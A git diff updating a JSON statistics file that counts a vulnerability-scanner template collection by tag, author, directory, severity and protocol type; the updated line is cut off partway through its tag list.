eb7207b358..79957df57d 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":547},{"name":"panel","count":213},{"name":"xss","count":202},{"name":"wordpress","count":189},{"name":"rce","count":181},{"name":"exposure","count":180},{"name":"lfi","count":155},{"name":"cve2020","count":153},{"name":"wp-plugin","count":127},{"name":"tech","count":97},{"name":"config","count":90},{"name":"cve2021","count":88},{"name":"cve2019","count":84},{"name":"takeover","count":72},{"name":"cve2018","count":69},{"name":"","count":66},{"name":"token","count":64},{"name":"apache","count":62},{"name":"default-login","count":51},{"name":"cve2017","count":45},{"name":"file","count":44},{"name":"iot","count":44},{"name":"unauth","count":42},{"name":"network","count":35},{"name":"oob","count":35},{"name":"sqli","count":34},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"logs","count":29},{"name":"ssrf","count":28},{"name":"cve2016","count":27},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":26},{"name":"disclosure","count":25},{"name":"listing","count":24},{"name":"redirect","count":21},{"name":"aem","count":19},{"name":"cisco","count":18},{"name":"sap","count":16},{"name":"cve2015","count":16},{"name":"cve2012","count":14},{"name":"debug","count":14},{"name":"cve2014","count":13},{"name":"struts","count":13},{"name":"fuzz","count":13},{"name":"auth-bypass","count":13},{"name":"misconfig","count":13},{"name":"android","count":13},{"name":"dns","count":12},{"name":"cve2011","count":12},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"jenkins","count":12},{"name":"springboot","count":11},{"name":"zoho","count":11},{"name":"devops","count":11},{"name":"dlink","count":11},{"name":"router","count":11},{"name":"php","count":10},{"name":"cve2013","count":10},{"name":"magento","count":9},{"name":"airflow","count":8},{"name":"ftp","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"aws","count":8},{"name":"cnvd","count":8},{"name":"login","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"cve2009","count":7},{"name":"xxe","count":7},{"name":"joomla","count":7},{"name":"vmware","count":7},{"name":"backup","count":6},{"name":"cms","count":6},{"name":"dell","count":6},{"name":"rconfig","count":6},{"name":"jetty","count":6},{"name":"coldfusion","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"google","count":6},{"name":"iis","count":5},{"name":"fileupload","count":5},{"name":"dedecms","count":5},{"name":"django","count":5},{"name":"confluence","count":5},{"name":"java","count":5},{"name":"headless","count":5},{"name":"files","count":5},{"name":"netgear","count":5},{"name":"ibm","count":5},{"name":"phpmyadmin","count":5},{"name":"circarlife","count":5},{"name":"solr","count":5},{"name":"laravel","count":5},{"name":"drupal","count":5},{"name":"ruijie","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"crlf","count":4},{"name":"docker","count":4},{"name":"deserialization","count":4},{"name":"jolokia","count":4},{"name":"magmi","count":4},{"name":"nodejs","count":4},{"name":"webserver","count":4},{"name":"hongdian","count":4},{"name":"thinkcmf","count":4},{"name":"artifactory","count":4},{"name":"vpn","count":4},{"name":"asp","count":4},{"name":"traversal","count":4},{"name":"moodle","count":4},{"name":"samsung","count":4},{"name":"solarwinds","count":4},{"name":"thinkphp","count":4},{"name":"elastic","count":4},{"name":"tomcat","count":4},{"name":"amazon","count":3},{"name":"kubernetes","count":3},{"name":"windows","count":3},{"name":"terramaster","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"fanruan","count":3},{"name":"backups","count":3},{"name":"mongodb","count":3},{"name":"printer","count":3},{"name":"openssh","count":3},{"name":"oa","count":3},{"name":"microstrategy","count":3},{"name":"targa","count":3},{"name":"zabbix","count":3},{"name":"hp","count":3},{"name":"zhiyuan","count":3},{"name":"kafka","count":3},{"name":"slack","count":3},{"name":"bypass","count":3},{"name":"ssh","count":3},{"name":"tikiwiki","count":3},{"name":"r-seenet","count":3},{"name":"ofbiz","count":3},{"name":"grafana","count":3},{"name":"git","count":3},{"name":"ebs","count":3},{"name":"cve2010","count":3},{"name":"log","count":3},{"name":"nacos","count":3},{"name":"caucho","count":3},{"name":"resin","count":3},{"name":"fpd","count":3},{"name":"vbulletin","count":3},{"name":"lfr","count":3},{"name":"itop","count":3},{"name":"nosqli","count":3},{"name":"wp-theme","count":2},{"name":"strapi","count":2},{"name":"voipmonitor","count":2},{"name":"hasura","count":2},{"name":"microsoft","count":2},{"name":"httpd","count":2},{"name":"idrac","count":2},{"name":"sonicwall","count":2},{"name":"plesk","count":2},{"name":"chiyu","count":2},{"name":"saltstack","count":2},{"name":"horde","count":2},{"name":"keycloak","count":2},{"name":"frp","count":2},{"name":"chamilo","count":2},{"name":"nagios","count":2},{"name":"vrealize","count":2},{"name":"kentico","count":2},{"name":"status","count":2},{"name":"leak","count":2},{"name":"splunk","count":2},{"name":"dolibarr","count":2},{"name":"ucmdb","count":2},{"name":"xxljob","count":2},{"name":"natshell","count":2},{"name":"showdoc","count":2},{"name":"activemq","count":2},{"name":"oauth","count":2},{"name":"akkadian","count":2},{"name":"seeyon","count":2},{"name":"hjtcloud","count":2},{"name":"cache","count":2},{"name":"jboss","count":2},{"name":"hpe","count":2},{"name":"proxy","count":2},{"name":"phpcollab","count":2},{"name":"github","count":2},{"name":"yapi","count":2},{"name":"linkerd","count":2},{"name":"mail","count":2},{"name":"hashicorp","count":2},{"name":"cve2007","count":2},{"name":"jeedom","count":2},{"name":"paloalto","count":2},{"name":"nexus","count":2},{"name":"trixbox","count":2},{"name":"wordfence","count":2},{"name":"pega","count":2},{"name":"smtp","count":2},{"name":"kibana","count":2},{"name":"grav","count":2},{"name":"webcam","count":2},{"name":"fortios","count":2},{"name":"sonarqube","count":2},{"name":"spark","count":2},{"name":"dos","count":2},{"name":"shellshock","count":2},{"name":"intrusive","count":2},{"name":"mida","count":2},{"name":"wso2","count":2},{"name":"odoo","count":2},{"name":"rstudio","count":2},{"name":"bigip","count":2},{"name":"huawei","count":2},{"name":"akamai","count":2},{"name":"igs","count":2},{"name":"service","count":2},{"name":"jsf","count":2},{"name":"glassfish","count":2},{"name":"rockmongo","count":2},{"name":"kevinlab","count":2},{"name":"openam","count":2},{"name":"cve2008","count":2},{"name":"couchdb","count":2},{"name":"injection","count":2},{"name":"flir","count":2},{"name":"sharepoint","count":2},{"name":"telerik","count":2},{"name":"nextjs","count":2},{"name":"globalprotect","count":2},{"name":"jellyfin","count":2},{"name":"smb","count":2},{"name":"openfire","count":2},{"name":"icewarp","count":2},{"name":"rockethchat","count":2},{"name":"maian","count":2},{"name":"emerge","count":2},{"name":"waf","count":2},{"name":"ecology","count":2},{"name":"prometheus","count":2},{"name":"cacti","count":1},{"name":"servicedesk","count":1},{"name":"pippoint","count":1},{"name":"vnc","count":1},{"name":"csod","count":1},{"name":"jsp","count":1},{"name":"ambari","count":1},{"name":"adminer","count":1},{"name":"nsasg","count":1},{"name":"redcap","count":1},{"name":"robomongo","count":1},{"name":"yealink","count":1},{"name":"phpunit","count":1},{"name":"openemr","count":1},{"name":"xml","count":1},{"name":"beanshell","count":1},{"name":"firebase","count":1},{"name":"timeclock","count":1},{"name":"gloo","count":1},{"name":"calendarix","count":1},{"name":"opencast","count":1},{"name":"fortilogger","count":1},{"name":"xiuno","count":1},{"name":"monitorr","count":1},{"name":"harbor","count":1},{"name":"drone","count":1},{"name":"zenario","count":1},{"name":"avalanche","count":1},{"name":"fortinet","count":1},{"name":"openx","count":1},{"name":"szhe","count":1},{"name":"froxlor","count":1},{"name":"concrete","count":1},{"name":"turbocrm","count":1},{"name":"kong","count":1},{"name":"sidekiq","count":1},{"name":"jeewms","count":1},{"name":"zm","count":1},{"name":"fastcgi","count":1},{"name":"clockwatch","count":1},{"name":"blind","count":1},{"name":"xff","count":1},{"name":"centreon","count":1},{"name":"flash","count":1},{"name":"cobub","count":1},{"name":"alertmanager","count":1},{"name":"phalcon","count":1},{"name":"flink","count":1},{"name":"powercreator","count":1},{"name":"visionhub","count":1},{"name":"gitlist","count":1},{"name":"tpshop","count":1},{"name":"geddy","count":1},{"name":"extractor","count":1},{"name":"octoprint","count":1},{"name":"traefik","count":1},{"name":"klog","count":1},{"name":"thinkadmin","count":1},{"name":"saltapi","count":1},{"name":"razor","count":1},{"name":"starttls","count":1},{"name":"hadoop","count":1},{"name":"sentry","count":1},{"name":"mongoshake","count":1},{"name":"crm","count":1},{"name":"metinfo","count":1},{"name":"netdata","count":1},{"name":"etouch","count":1},{"name":"mailchimp","count":1},{"name":"svnserve","count":1},{"name":"arl","count":1},{"name":"smartsense","count":1},{"name":"openrestry","count":1},{"name":"ns","count":1},{"name":"payara","count":1},{"name":"lotuscms","count":1},{"name":"wondercms","count":1},{"name":"xdcms","count":1},{"name":"grails","count":1},{"name":"druid","count":1},{"name":"74cms","count":1},{"name":"api-manager","count":1},{"name":"realteo","count":1},{"name":"nordex","count":1},{"name":"tamronos","count":1},{"name":"tensorboard","count":1},{"name":"kafdrop","count":1},{"name":"bash","count":1},{"name":"javascript","count":1},{"name":"netis","count":1},{"name":"ecom","count":1},{"name":"clink-office","count":1},{"name":"cse","count":1},{"name":"xvr","count":1},{"name":"rmc","count":1},{"name":"fastapi","count":1},{"name":"wing-ftp","count":1},{"name":"ec2","count":1},{"name":"csrf","count":1},{"name":"spip","count":1},{"name":"postmessage","count":1},{"name":"bitly","count":1},{"name":"eyou","count":1},{"name":"finereport","count":1},{"name":"zookeeper","count":1},{"name":"solman","count":1},{"name":"fortigate","count":1},{"name":"webadmin","count":1},{"name":"checkpoint","count":1},{"name":"xunchi","count":1},{"name":"landray","count":1},{"name":"gespage","count":1},{"name":"sureline","count":1},{"name":"zimbra","count":1},{"name":"vscode","count":1},{"name":"jfrog","count":1},{"name":"doh","count":1},{"name":"cors","count":1},{"name":"node","count":1},{"name":"cve2005","count":1},{"name":"htmli","count":1},{"name":"wamp","count":1},{"name":"zte","count":1},{"name":"sprintful","count":1},{"name":"ueditor","count":1},{"name":"kubeflow","count":1},{"name":"redis","count":1},{"name":"hiboss","count":1},{"name":"b2evolution","count":1},{"name":"npm","count":1},{"name":"wazuh","count":1},{"name":"rmi","count":1},{"name":"mongo","count":1},{"name":"sceditor","count":1},{"name":"javafaces","count":1},{"name":"default","count":1},{"name":"trilithic","count":1},{"name":"ricoh","count":1},{"name":"alibaba","count":1},{"name":"geutebruck","count":1},{"name":"chinaunicom","count":1},{"name":"totaljs","count":1},{"name":"clusterengine","count":1},{"name":"mariadb","count":1},{"name":"embedthis","count":1},{"name":"guacamole","count":1},{"name":"enumeration","count":1},{"name":"email","count":1},{"name":"pulsesecure","count":1},{"name":"portainer","count":1},{"name":"spf","count":1},{"name":"apos","count":1},{"name":"apiman","count":1},{"name":"ems","count":1},{"name":"blackboard","count":1},{"name":"centos","count":1},{"name":"kerbynet","count":1},{"name":"zeroshell","count":1},{"name":"hortonworks","count":1},{"name":"aura","count":1},{"name":"webmodule-ee","count":1},{"name":"parentlink","count":1},{"name":"k8","count":1},{"name":"kyan","count":1},{"name":"tenda","count":1},{"name":"subrion","count":1},{"name":"vsftpd","count":1},{"name":"opm","count":1},{"name":"webui","count":1},{"name":"fedora","count":1},{"name":"auth","count":1},{"name":"anchorcms","count":1},{"name":"eprints","count":1},{"name":"rabbitmq","count":1},{"name":"sourcebans","count":1},{"name":"jenzabar","count":1},{"name":"monitorix","count":1},{"name":"ganglia","count":1},{"name":"optiLink","count":1},{"name":"tileserver","count":1},{"name":"cgi","count":1},{"name":"ulterius","count":1},{"name":"addpac","count":1},{"name":"panos","count":1},{"name":"haproxy","count":1},{"name":"nexusdb","count":1},{"name":"jitsi","count":1},{"name":"vsphere","count":1},{"name":"lanproxy","count":1},{"name":"manageengine","count":1},{"name":"bolt","count":1},{"name":"wooyun","count":1},{"name":"phpinfo","count":1},{"name":"camunda","count":1},{"name":"wavemaker","count":1},{"name":"javamelody","count":1},{"name":"ruby","count":1},{"name":"keenetic","count":1},{"name":"acme","count":1},{"name":"upnp","count":1},{"name":"octobercms","count":1},{"name":"acontent","count":1},{"name":"episerver","count":1},{"name":"zyxel","count":1},{"name":"mantis","count":1},{"name":"wmt","count":1},{"name":"shopxo","count":1},{"name":"landrayoa","count":1},{"name":"influxdb","count":1},{"name":"plugin","count":1},{"name":"interlib","count":1},{"name":"tapestry","count":1},{"name":"webmin","count":1},{"name":"wildfly","count":1},{"name":"tensorflow","count":1},{"name":"emc","count":1},{"name":"lutron","count":1},{"name":"socomec","count":1},{"name":"majordomo2","count":1},{"name":"h3c-imc","count":1},{"name":"ruckus","count":1},{"name":"heroku","count":1},{"name":"nomad","count":1},{"name":"ioncube","count":1},{"name":"sangfor","count":1},{"name":"pagespeed","count":1},{"name":"zmanda","count":1},{"name":"sage","count":1},{"name":"bigbluebutton","count":1},{"name":"seacms","count":1},{"name":"visualtools","count":1},{"name":"azure","count":1},{"name":"opensns","count":1},{"name":"nc2","count":1},{"name":"scs","count":1},{"name":"circontrol","count":1},{"name":"plc","count":1},{"name":"dom","count":1},{"name":"jmx","count":1},{"name":"xmlchart","count":1},{"name":"yachtcontrol","count":1},{"name":"axis","count":1},{"name":"biometrics","count":1},{"name":"lansweeper","count":1},{"name":"fortiweb","count":1},{"name":"dompdf","count":1},{"name":"cloudinary","count":1},{"name":"expose","count":1},{"name":"bedita","count":1},{"name":"rsyncd","count":1},{"name":"plastic","count":1},{"name":"discord","count":1},{"name":"memcached","count":1},{"name":"panabit","count":1},{"name":"expn","count":1},{"name":"st","count":1},{"name":"woocomernce","count":1},{"name":"nuuo","count":1},{"name":"zcms","count":1},{"name":"netrc","count":1},{"name":"bookstack","count":1},{"name":"triconsole","count":1},{"name":"lg-nas","count":1},{"name":"fortigates","count":1},{"name":"sgp","count":1},{"name":"domxss","count":1},{"name":"qvisdvr","count":1},{"name":"glances","count":1},{"name":"livezilla","count":1},{"name":"redhat","count":1},{"name":"viewlinc","count":1},{"name":"magicflow","count":1},{"name":"tika","count":1},{"name":"pyramid","count":1},{"name":"ssltls","count":1},{"name":" default-login","count":1},{"name":"sco","count":1},{"name":"acexy","count":1},{"name":"maccmsv10","count":1},{"name":"ilo4","count":1},{"name":"liferay","count":1},{"name":"nette","count":1},{"name":"weiphp","count":1},{"name":"redwood","count":1},{"name":"stem","count":1},{"name":"ntopng","count":1},{"name":"appweb","count":1},{"name":"cerebro","count":1},{"name":"mcafee","count":1},{"name":"dotnet","count":1},{"name":"dvwa","count":1},{"name":"cocoon","count":1},{"name":"jnoj","count":1},{"name":"sqlite","count":1},{"name":"pacsone","count":1},{"name":"rujjie","count":1},{"name":"twitter-server","count":1},{"name":"ssl","count":1},{"name":"wavlink","count":1},{"name":"opentsdb","count":1},{"name":"spring","count":1},{"name":"bullwark","count":1},{"name":"linkedin","count":1},{"name":"salesforce","count":1},{"name":"goahead","count":1},{"name":"mysql","count":1},{"name":"jenkin","count":1},{"name":"iptime","count":1},{"name":"diris","count":1},{"name":"oscommerce","count":1},{"name":"scimono","count":1},{"name":"spectracom","count":1},{"name":"swagger","count":1},{"name":"floc","count":1},{"name":"enum","count":1},{"name":"idemia","count":1},{"name":"timesheet","count":1},{"name":"gateone","count":1},{"name":"uwsgi","count":1},{"name":"clave","count":1},{"name":"faraday","count":1},{"name":"mirai","count":1},{"name":"plone","count":1},{"name":"favicon","count":1},{"name":"skywalking","count":1},{"name":"netsweeper","count":1},{"name":"rubedo","count":1},{"name":"soar","count":1},{"name":"sitecore","count":1},{"name":"avtech","count":1},{"name":"varnish","count":1},{"name":"qcubed","count":1},{"name":"rfi","count":1},{"name":"linksys","count":1},{"name":"exposures","count":1},{"name":"viewpoint","count":1},{"name":"chevereto","count":1},{"name":"upload","count":1},{"name":"svn","count":1},{"name":"gridx","count":1},{"name":"duomicms","count":1},{"name":"exchange","count":1},{"name":"mantisbt","count":1},{"name":"db","count":1},{"name":"rhymix","count":1},{"name":"esmtp","count":1},{"name":"aspnuke","count":1},{"name":"sarg","count":1},{"name":"comodo","count":1},{"name":"codemeter","count":1},{"name":"synnefo","count":1},{"name":"primetek","count":1},{"name":"springframework","count":1},{"name":"dnssec","count":1},{"name":"myucms","count":1},{"name":"dvr","count":1},{"name":"aruba","count":1},{"name":"setup","count":1},{"name":"zzzcms","count":1},{"name":"symfony","count":1},{"name":"gogs","count":1},{"name":"mdb","count":1},{"name":"erp-nc","count":1},{"name":"accela","count":1},{"name":"commscope","count":1},{"name":"gotmls","count":1},{"name":"zarafa","count":1},{"name":"opensmtpd","count":1},{"name":"alerta","count":1},{"name":"ghost","count":1},{"name":"zend","count":1},{"name":"moin","count":1},{"name":"yii","count":1},{"name":"postgres","count":1},{"name":"mpsec","count":1},{"name":"codeigniter","count":1},{"name":"wuzhicms","count":1},{"name":"openerp","count":1},{"name":"node-red-dashboard","count":1},{"name":"nuxeo","count":1},{"name":"circontrorl","count":1},{"name":"resourcespace","count":1},{"name":"cloudflare","count":1},{"name":"moinmoin","count":1},{"name":"getsimple","count":1},{"name":"expressjs","count":1},{"name":"servicenow","count":1},{"name":"spidercontrol","count":1},{"name":"huijietong","count":1},{"name":"k8s","count":1},{"name":"mautic","count":1},{"name":"nps","count":1},{"name":"wifisky","count":1},{"name":"glpi","count":1},{"name":"achecker","count":1},{"name":"feifeicms","count":1},{"name":"discourse","count":1},{"name":"bruteforce","count":1},{"name":"pgadmin","count":1},{"name":"backdoor","count":1},{"name":"dotclear","count":1},{"name":"mediumish","count":1},{"name":"openstack","count":1},{"name":"lancom","count":1},{"name":"blue-ocean","count":1},{"name":"lighttpd","count":1},{"name":"emby","count":1},{"name":"labtech","count":1},{"name":"fiori","count":1},{"name":"jquery","count":1},{"name":"dotnetnuke","count":1},{"name":"krweb","count":1},{"name":"shopware","count":1},{"name":"nedi","count":1},{"name":"phpfusion","count":1},{"name":"fuelcms","count":1},{"name":"mara","count":1},{"name":"wiki","count":1},{"name":"tongda","count":1},{"name":"empirecms","count":1},{"name":"darkstat","count":1},{"name":"selea","count":1},{"name":"2014","count":1},{"name":"mobileiron","count":1},{"name":"rdp","count":1},{"name":"webftp","count":1},{"name":"proftpd","count":1},{"name":"exacqvision","count":1}],"authors":[{"name":"dhiyaneshdk","count":232},{"name":"pikpikcu","count":225},{"name":"pdteam","count":189},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":122},{"name":"daffainfo","count":114},{"name":"madrobot","count":60},{"name":"gy741","count":54},{"name":"princechaddha","count":53},{"name":"gaurang","count":42},{"name":"pussycat0x","count":36},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"philippedelteil","count":16},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"pr3r00t","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":9},{"name":"wdahlenb","count":9},{"name":"nadino","count":8},{"name":"r3dg33k","count":8},{"name":"melbadry9","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"randomstr1ng","count":7},{"name":"oppsec","count":7},{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dr_set","count":7},{"name":"kophjager007","count":7},{"name":"harshbothra_","count":7},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"ganofins","count":5},{"name":"yanyun","count":5},{"name":"joanbono","count":5},{"name":"panch0r3d","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"pentest_swissky","count":5},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"elsfa7110","count":4},{"name":"github.com/its0x08","count":4},{"name":"meme-lord","count":4},{"name":"e_schultze_","count":4},{"name":"f1tz","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"shine","count":3},{"name":"dudez","count":3},{"name":"jarijaas","count":3},{"name":"0w4ys","count":3},{"name":"z3bd","count":3},{"name":"thomas_from_offensity","count":3},{"name":"_generic_human_","count":3},{"name":"vsh00t","count":3},{"name":"tess","count":3},{"name":"fyoorer","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"impramodsargar","count":3},{"name":"binaryfigments","count":3},{"name":"ree4pwn","count":2},{"name":"joeldeleep","count":2},{"name":"0xcrypto","count":2},{"name":"0xelkomy","count":2},{"name":"pxmme1337","count":2},{"name":"randomrobbie","count":2},{"name":"hetroublemakr","count":2},{"name":"hahwul","count":2},{"name":"bing0o","count":2},{"name":"lotusdll","count":2},{"name":"afaq","count":2},{"name":"lu4nx","count":2},{"name":"swissky","count":2},{"name":"amsda","count":2},{"name":"0xsapra","count":2},{"name":"alifathi-h1","count":2},{"name":"dheerajmadhukar","count":2},{"name":"udit_thakkur","count":2},{"name":"bsysop","count":2},{"name":"manas_harsh","count":2},{"name":"w4cky_","count":2},{"name":"gevakun","count":2},{"name":"kiblyn11","count":2},{"name":"0xprial","count":2},{"name":"bp0lr","count":2},{"name":"zomsop82","count":2},{"name":"foulenzer","count":2},{"name":"x1m_martijn","count":2},{"name":"0xrudra","count":2},{"name":"davidmckennirey","count":2},{"name":"incogbyte","count":2},{"name":"moritz nentwig","count":2},{"name":"unstabl3","count":2},{"name":"vavkamil","count":2},{"name":"random-robbie","count":2},{"name":"nkxxkn","count":2},{"name":"fabaff","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"koti2","count":2},{"name":"emenalf","count":2},{"name":"ehsahil","count":2},{"name":"jteles","count":1},{"name":"knassar702","count":1},{"name":"b4uh0lz","count":1},{"name":"yavolo","count":1},{"name":"akash.c","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"hanlaomo","count":1},{"name":"becivells","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"gboddin","count":1},{"name":"j33n1k4","count":1},{"name":"0xteles","count":1},{"name":"mohammedsaneem","count":1},{"name":"kareemse1im","count":1},{"name":"rojanrijal","count":1},{"name":"mah3sec_","count":1},{"name":"alperenkesk","count":1},{"name":"bolli95","count":1},{"name":"_darrenmartyn","count":1},{"name":"luci","count":1},{"name":"vzamanillo","count":1},{"name":"ahmed sherif","count":1},{"name":"s1r1u5_","count":1},{"name":"ipanda","count":1},{"name":"yashgoti","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"taielab","count":1},{"name":"0h1in9e","count":1},{"name":"tim_koopmans","count":1},{"name":"sicksec","count":1},{"name":"absshax","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kabirsuda","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"whynotke","count":1},{"name":"rodnt","count":1},{"name":"geraldino2","count":1},{"name":"c3l3si4n","count":1},{"name":"noamrathaus","count":1},{"name":"th3.d1p4k","count":1},{"name":"rtcms","count":1},{"name":"d0rkerdevil","count":1},{"name":"co0nan","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"cookiehanhoan","count":1},{"name":"ldionmarcil","count":1},{"name":"abison_binoy","count":1},{"name":"andirrahmani1","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"sy3omda","count":1},{"name":"_c0wb0y_","count":1},{"name":"shelld3v","count":1},{"name":"omarkurt","count":1},{"name":"52971","count":1},{"name":"soyelmago","count":1},{"name":"r3naissance","count":1},{"name":"raesene","count":1},{"name":"undefl0w","count":1},{"name":"manuelbua","count":1},{"name":"chron0x","count":1},{"name":"udyz","count":1},{"name":"sickwell","count":1},{"name":"johnk3r","count":1},{"name":"hakluke","count":1},{"name":"bernardofsr","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"apt-mirror","count":1},{"name":"ilovebinbash","count":1},{"name":"ooooooo_q","count":1},{"name":"thezakman","count":1},{"name":"aresx","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"sshell","count":1},{"name":"@dwisiswant0","count":1},{"name":"notsoevilweasel","count":1},{"name":"retr0","count":1},{"name":"naglinagli","count":1},{"name":"divya_mudgal","count":1},{"name":"alex","count":1},{"name":"fmunozs","count":1},{"name":"sullo","count":1},{"name":"smaranchand","count":1},{"name":"idealphase","count":1},{"name":"makyotox","count":1},{"name":"ohlinge","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"mubassirpatel","count":1},{"name":"pdp","count":1},{"name":"defr0ggy","count":1},{"name":"0xrod","count":1},{"name":"ajaysenr","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"furkansenan","count":1},{"name":"schniggie","count":1},{"name":"huowuzhao","count":1},{"name":"johnjhacking","count":1},{"name":"thevillagehacker","count":1},{"name":"philippdelteil","count":1},{"name":"alph4byt3","count":1},{"name":"kurohost","count":1},{"name":"patralos","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"elder tao","count":1},{"name":"andysvints","count":1},{"name":"juicypotato1","count":1},{"name":"its0x08","count":1},{"name":"willd96","count":1},{"name":"deena","count":1},{"name":"mhdsamx","count":1},{"name":"regala_","count":1},{"name":"tirtha_mandal","count":1},{"name":"bad5ect0r","count":1},{"name":"pudsec","count":1},{"name":"qlkwej","count":1},{"name":"petruknisme","count":1},{"name":"gal nagli","count":1},{"name":"dawid czarnecki","count":1},{"name":"_harleo","count":1},{"name":"nytr0gen","count":1},{"name":"remonsec","count":1},{"name":"luskabol","count":1},{"name":"fopina","count":1},{"name":"zandros0","count":1},{"name":"me9187","count":1},{"name":"streetofhackerr007","count":1},{"name":"0ut0fb4nd","count":1},{"name":"un-fmunozs","count":1},{"name":"akshansh","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"exploitation","count":1},{"name":"wabafet","count":1},{"name":"ringo","count":1},{"name":"toufik airane","count":1},{"name":"berkdusunur","count":1},{"name":"b0yd","count":1},{"name":"elmahdi","count":1},{"name":"zhenwarx","count":1},{"name":"dogasantos","count":1},{"name":"shifacyclewla","count":1},{"name":"micha3lb3n","count":1},{"name":"arcc","count":1},{"name":"shreyapohekar","count":1},{"name":"0xtavian","count":1},{"name":"bjhulst","count":1},{"name":"flag007","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"daviey","count":1},{"name":"iampritam","count":1},{"name":"yashanand155","count":1},{"name":"revblock","count":1},{"name":"affix","count":1},{"name":"blckraven","count":1},{"name":"jeya seelan","count":1}],"directory":[{"name":"cves","count":554},{"name":"vulnerabilities","count":252},{"name":"exposed-panels","count":215},{"name":"exposures","count":170},{"name":"technologies","count":156},{"name":"misconfiguration","count":119},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":44},{"name":"workflows","count":34},{"name":"miscellaneous","count":27},{"name":"network","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":569},{"name":"high","count":441},{"name":"medium","count":371},{"name":"critical","count":210},{"name":"low","count":150}],"types":[{"name":"http","count":1646},{"name":"file","count":44},{"name":"network","count":35},{"name":"dns","count":11}]} +{"tags":[{"name":"cve","count":576},{"name":"panel","count":214},{"name":"xss","count":213},{"name":"wordpress","count":198},{"name":"exposure","count":196},{"name":"rce","count":183},{"name":"lfi","count":168},{"name":"cve2020","count":155},{"name":"wp-plugin","count":133},{"name":"tech","count":100},{"name":"cve2021","count":92},{"name":"config","count":91},{"name":"cve2019","count":86},{"name":"cve2018","count":74},{"name":"takeover","count":73},{"name":"","count":65},{"name":"token","count":64},{"name":"apache","count":64},{"name":"default-login","count":54},{"name":"cve2017","count":47},{"name":"file","count":46},{"name":"iot","count":44},{"name":"unauth","count":42},{"name":"oob","count":41},{"name":"sqli","count":35},{"name":"network","count":35},{"name":"ssrf","count":30},{"name":"cve2016","count":30},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"logs","count":29},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":26},{"name":"redirect","count":25},{"name":"listing","count":24},{"name":"aem","count":19},{"name":"cve2015","count":18},{"name":"cisco","count":18},{"name":"sap","count":18},{"name":"disclosure","count":17},{"name":"springboot","count":15},{"name":"debug","count":14},{"name":"cve2012","count":14},{"name":"cve2014","count":14},{"name":"misconfig","count":13},{"name":"auth-bypass","count":13},{"name":"struts","count":13},{"name":"android","count":13},{"name":"cve2011","count":13},{"name":"dlink","count":12},{"name":"dns","count":12},{"name":"jenkins","count":12},{"name":"adobe","count":12},{"name":"weblogic","count":12},{"name":"zoho","count":11},{"name":"php","count":11},{"name":"fuzz","count":11},{"name":"cve2013","count":11},{"name":"router","count":11},{"name":"devops","count":11},{"name":"joomla","count":11},{"name":"magento","count":9},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"aws","count":8},{"name":"ftp","count":8},{"name":"xxe","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"rails","count":8},{"name":"vmware","count":7},{"name":"nginx","count":7},{"name":"login","count":7},{"name":"scada","count":7},{"name":"cve2009","count":7},{"name":"coldfusion","count":6},{"name":"citrix","count":6},{"name":"cms","count":6},{"name":"api","count":6},{"name":"cve2010","count":6},{"name":"laravel","count":6},{"name":"google","count":6},{"name":"jetty","count":6},{"name":"backup","count":6},{"name":"rconfig","count":6},{"name":"solr","count":6},{"name":"dell","count":6},{"name":"dedecms","count":5},{"name":"fileupload","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"wp-theme","count":5},{"name":"files","count":5},{"name":"drupal","count":5},{"name":"netgear","count":5},{"name":"lucee","count":5},{"name":"ssti","count":5},{"name":"confluence","count":5},{"name":"django","count":5},{"name":"phpmyadmin","count":5},{"name":"ibm","count":5},